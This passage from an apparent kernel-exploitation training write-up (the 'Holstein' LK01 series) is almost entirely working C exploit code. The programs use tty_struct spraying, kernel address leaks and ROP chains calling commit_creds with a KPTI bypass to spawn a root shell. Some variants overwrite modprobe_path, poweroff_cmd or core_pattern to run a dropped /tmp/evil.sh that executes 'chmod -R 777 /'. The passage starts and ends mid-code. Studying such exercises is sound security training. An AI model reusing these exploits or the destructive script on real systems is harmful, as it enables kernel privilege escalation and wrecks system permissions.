user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char *argv[] = {&#34;/bin/sh&#34;, NULL}; char *envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[VULN_BUFFER_SIZE * 2]; save_state(); int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = PUSH_RDX_POP_RSP_R13_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); for (int i = 0; i &lt; 100; ++i) { ioctl(tty_spray[i], 0x00, g_buf_addr - 0x08 * 2 + 0x08); } close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="386257194" type="checkbox" checked /> <label for="386257194"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_cred.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kEvilProcessName[] = &#34;uniguri&#34;; if (prctl(PR_SET_NAME, kEvilProcessName) == -1) { printf(&#34;[-] Failed to set process name\n&#34;); return -1; } SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t cur_task_addr = 0; for (uint64_t cur_addr = g_buf_addr - 0x1000000;; cur_addr += 8) { uint32_t val = AAR32(cur_addr); #if PRINT_DEBUG == 1 if ((cur_addr &amp; 0xfffff) == 0) { printf(&#34;[*] Searching 0x%016lx...\n&#34;, cur_addr); } #endif if (val == *(uint32_t *)(kEvilProcessName)) { val = AAR32(cur_addr + 0x04); if (val == *(uint32_t *)(kEvilProcessName + 4)) { cur_task_addr = cur_addr; #if PRINT_DEBUG == 1 printf(&#34;[+] Found current task name(%s): 0x%016lx\n&#34;, kEvilProcessName, cur_task_addr); #endif break; } } } if (cur_task_addr == 0) { printf(&#34;[-] Failed to find current task\n&#34;); return -1; } uint64_t cur_task_cred = AAR32(cur_task_addr - 8) | ((uint64_t)AAR32(cur_task_addr - 4) &lt;&lt; 32); #if PRINT_DEBUG == 1 printf(&#34;[*] current_task_cred: 0x%016lx\n&#34;, cur_task_cred); #endif SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 1; i &lt; 9; ++i) { AAW32(cur_task_cred + 0x4 * i, 0); } puts(&#34;[+] Get shell!&#34;); system(&#34;/bin/sh&#34;); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="569318274" type="checkbox" checked /> <label for="569318274"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_modprobe_path.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define MODPROB_PATH_OFFSET (0xffffffff81e38180 - KERNEL_BASE) #define MODPROBE_PATH_ADDR (kernel_base + MODPROB_PATH_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(MODPROBE_PATH_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="452697183" type="checkbox" checked /> <label for="452697183"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_poweroff_cmd.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define POWEROFF_CMD_OFFSET (0xffffffff81e379c0 - KERNEL_BASE) #define POWEROFF_CMD_ADDR (kernel_base + POWEROFF_CMD_OFFSET) #define ORDERLY_POWEROFF_OFFSET (0xffffffff810750e0 - KERNEL_BASE) #define ORDERLY_POWEROFF (kernel_base + ORDERLY_POWEROFF_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(POWEROFF_CMD_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); SET_IOCTL_INST_ADDR(ORDERLY_POWEROFF); ioctl(modified_tty_fd, 0, 0); #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <div class="collapsable-code"> <input id="968312457" type="checkbox" checked /> <label for="968312457"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_core_pattern.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define MOV_DWORD_PTR_RDX_ECX_OFFSET (0xffffffff8101083d - KERNEL_BASE) #define MOV_DWORD_PTR_RDX_ECX (kernel_base + MOV_DWORD_PTR_RDX_ECX_OFFSET) #define MOV_EAX_DWORD_PTR_RDX_OFFSET (0xffffffff8118a285 - KERNEL_BASE) #define MOV_EAX_DWORD_PTR_RDX (kernel_base + MOV_EAX_DWORD_PTR_RDX_OFFSET) #define CORE_PATTERN_OFFSET (0xffffffff81eb0b20 - KERNEL_BASE) #define CORE_PATTERN_ADDR (kernel_base + CORE_PATTERN_OFFSET) uint64_t kernel_base, g_buf_addr; int main() { char buf[VULN_BUFFER_SIZE * 2]; int tty_spray[100]; for (int i = 0; i &lt; 50; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } int fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (fd &lt; 0) { printf(&#34;[-] Failed to open &#34; VULN_DEVICE_NAME &#34;\n&#34;); return -1; } for (int i = 50; i &lt; 100; ++i) { tty_spray[i] = open(&#34;/dev/ptmx&#34;, O_RDONLY | O_NOCTTY); if (tty_spray[i] &lt; 0) { printf(&#34;[-] Failed to open tty\n&#34;); return -1; } } read(fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x400 + 0x08 * 3) - 0xc38880; g_buf_addr = *(uint64_t *)(buf + 0x400 + 0x08 * 7) - 0x438; if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } #if PRINT_DEBUG == 1 printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = 0xdeadbeefcafebebe; // overwrite ioctl *(uint64_t *)(buf + 0x400 + 0x08 * 3) = g_buf_addr - 0x0c * 8; write(fd, buf, sizeof(buf)); #define AAW_INST_ADDR MOV_DWORD_PTR_RDX_ECX #define AAR_INST_ADDR MOV_EAX_DWORD_PTR_RDX #define SET_IOCTL_INST_ADDR(ADDR) \ ({ \ *(uint64_t *)(buf) = (uint64_t)(ADDR); \ write(fd, buf, sizeof(buf)); \ }) SET_IOCTL_INST_ADDR(AAR_INST_ADDR); uint64_t modified_tty_fd = 0; for (int i = 0; i &lt; 100; ++i) { if (ioctl(tty_spray[i], 0x00, g_buf_addr) == *(uint32_t *)buf) { modified_tty_fd = tty_spray[i]; break; } } #define AAW32(ADDR, VAL) \ ({ \ ioctl(modified_tty_fd, (uint32_t)(VAL), \ (uint64_t)(ADDR)); /*RCX &lt;- ARG1, RDX &lt;- ARG2*/ \ }) #define AAR32(ADDR) \ ({ \ uint32_t ret = ioctl(modified_tty_fd, 0x00, (uint64_t)(ADDR)); \ ret; \ }) const char kRunEvilCmd[] = &#34;|/tmp/evil.sh&#34;; SET_IOCTL_INST_ADDR(AAW_INST_ADDR); for (int i = 0; i &lt; sizeof(kRunEvilCmd); i += 4) { AAW32(CORE_PATTERN_ADDR + i, *(uint32_t *)(kRunEvilCmd + i)); } system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t *evil_ptr = (uint64_t *)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; #undef SET_IOCTL_INST_ADDR #undef AAR32 #undef AAW32 close(fd); for (int i = 0; i &lt; 100; ++i) { close(tty_spray[i]); } return 0; }</code></pre></div> <h2 id="lk01-3-holstein-v3-use-after-free">LK01-3 (Holstein v3: Use-after-Free)</h2> <div class="collapsable-code"> <input id="739126845" type="checkbox" checked /> <label for="739126845"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#include &lt;assert.h&gt; #include &lt;fcntl.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_XOR_EAX_POP_RSP_RBP_OFFSET (0xffffffff8114fbea - KERNEL_BASE) #define PUSH_RDX_XOR_EAX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_XOR_EAX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff8114078a - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81072560 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_OFFSET (0xffffffff810eb7e4 - KERNEL_BASE) #define POP_RCX (kernel_base + POP_RCX_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff81638e9b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810723c0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) uint64_t kernel_base, g_buf_addr; uint64_t user_cs, user_ss, user_sp, user_rflags; static void save_state() { asm(&#34;mov %[u_cs], cs;\n&#34; &#34;mov %[u_ss], ss;\n&#34; &#34;mov %[u_sp], rsp;\n&#34; &#34;pushf;\n&#34; &#34;pop %[u_rflags];\n&#34; : [u_cs] &#34;=r&#34;(user_cs), [u_ss] &#34;=r&#34;(user_ss), [u_sp] &#34;=r&#34;(user_sp), [u_rflags] &#34;=r&#34;(user_rflags)::&#34;memory&#34;); #if PRINT_DEBUG == 1 printf( &#34;[*] user_cs: 0x%lx, user_ss: 0x%lx, user_sp: 0x%lx, user_rflags: &#34; &#34;0x%lx\n&#34;, user_cs, user_ss, user_sp, user_rflags); #endif } static void get_shell() { char *argv[] = {&#34;/bin/sh&#34;, NULL}; char *envp[] = {NULL}; puts(&#34;[+] Get shell!&#34;); execve(&#34;/bin/sh&#34;, argv, envp); } int main() { char buf[VULN_BUFFER_SIZE]; save_state(); int tmp_fd1 = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (tmp_fd1 &lt; 0) { return -1; } int rop_and_vtable_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (rop_and_vtable_fd &lt; 0) { return -1; } close(tmp_fd1); int tmp_tty1 = open(&#34;/dev/ptmx&#34;, O_NOCTTY); if (tmp_tty1 &lt; 0) { return -1; } read(rop_and_vtable_fd, buf, sizeof(buf)); kernel_base = *(uint64_t *)(buf + 0x08 * 3) - 0xc39c60; g_buf_addr = *(uint64_t *)(buf + 0x08 * 7) - 0x38; #if PRINT_DEBUG == 1 if (kernel_base &amp; 0xFFFFFF != 0) { printf(&#34;[-] Failed to leak kernel base\n&#34;); return -1; } if (g_buf_addr &amp; 0xFF != 0) { printf(&#34;[-] Failed to leak g_buf base\n&#34;); return -1; } printf(&#34;[*] kernel_base: %p\n&#34;, (void *)kernel_base); printf(&#34;[*] g_buf_addr: %p\n&#34;, (void *)g_buf_addr); #endif uint64_t *rop_buf = (uint64_t *)buf; *rop_buf++ = PUSH_RDX_XOR_EAX_POP_RSP_RBP; // overwrite ioctl *rop_buf++ = POP_RDI; *rop_buf++ = 0; *rop_buf++ = PREPARE_KERNEL_CRED; *rop_buf++ = POP_RCX; *rop_buf++ = 0; *rop_buf++ = MOV_RDI_RAX_REP; *rop_buf++ = COMMIT_CREDS; *rop_buf++ = BYPASS_KPTI; *rop_buf++ = 0xdeadbeefcafebe00; *rop_buf++ = 0xdeadbeefcafebe01; *rop_buf++ = (uint64_t)(get_shell); *rop_buf++ = (uint64_t)(user_cs); *rop_buf++ = (uint64_t)(user_rflags); *rop_buf++ = (uint64_t)(user_sp); *rop_buf++ = (uint64_t)(user_ss); write(rop_and_vtable_fd, buf, sizeof(buf)); int tmp_fd2 = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (tmp_fd2 &lt; 0) { return -1; } int uaf_fd = open(&#34;/dev/&#34; VULN_DEVICE_NAME, O_RDWR); if (uaf_fd &lt; 0) { return -1; } close(tmp_fd2); int tty_fd = open(&#34;/dev/ptmx&#34;, O_NOCTTY); if (tty_fd &lt; 0) { return -1; } read(uaf_fd, buf, sizeof(buf)); *(uint64_t *)(buf + 8 * 3) = g_buf_addr - 0xC * 8; write(uaf_fd, buf, sizeof(buf)); ioctl(tty_fd, 0x00, g_buf_addr); return 0; }</code></pre></div> <h2 id="lk01-4-holstein-v4-race-condition">LK01-4 (Holstein v4: Race Condition)</h2> <div class="collapsable-code"> <input id="814732569" type="checkbox" checked /> <label for="814732569"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">exploit_using_tty_struct.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;bits/syscall.h&gt; #include &lt;fcntl.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define PRINT_DEBUG 1 #define VULN_DEVICE_NAME &#34;holstein&#34; #define VULN_BUFFER_SIZE 0x400 #define KERNEL_BASE 0xffffffff81000000 #define PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP_OFFSET \ (0xffffffff81137da8 - KERNEL_BASE) #define PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP \ (kernel_base + PUSH_RDX_ADD_BYTE_PTR_RBX_POP_RSP_RBP_OFFSET) #define POP_RDI_OFFSET (0xffffffff810b13c5 - KERNEL_BASE) #define POP_RDI (kernel_base + POP_RDI_OFFSET) #define PREPARE_KERNEL_CRED_OFFSET (0xffffffff81072580 - KERNEL_BASE) #define PREPARE_KERNEL_CRED (kernel_base + PREPARE_KERNEL_CRED_OFFSET) #define POP_RCX_RBX_RBP_OFFSET (0xffffffff813006fc - KERNEL_BASE) #define POP_RCX_RBX_RBP (kernel_base + POP_RCX_RBX_RBP_OFFSET) #define MOV_RDI_RAX_REP_OFFSET (0xffffffff8165094b - KERNEL_BASE) #define MOV_RDI_RAX_REP (kernel_base + MOV_RDI_RAX_REP_OFFSET) #define COMMIT_CREDS_OFFSET (0xffffffff810723e0 - KERNEL_BASE) #define COMMIT_CREDS (kernel_base + COMMIT_CREDS_OFFSET) #define BYPASS_KPTI_OFFSET \ (0xffffffff81800e26 - \ KERNEL_BASE) // Offset in the function // swapgs_restore_regs_and_return_to_usermode #define BYPASS_KPTI (kernel_base + BYPASS_KPTI_OFFSET) void fatal(const char* msg) { perror(msg); exit(-1); } pid_t gettid(void) { return syscall(SYS_gettid); } static int next_fd1 = -1, next_fd2 = -1; static int vuln_fd1 = -1, 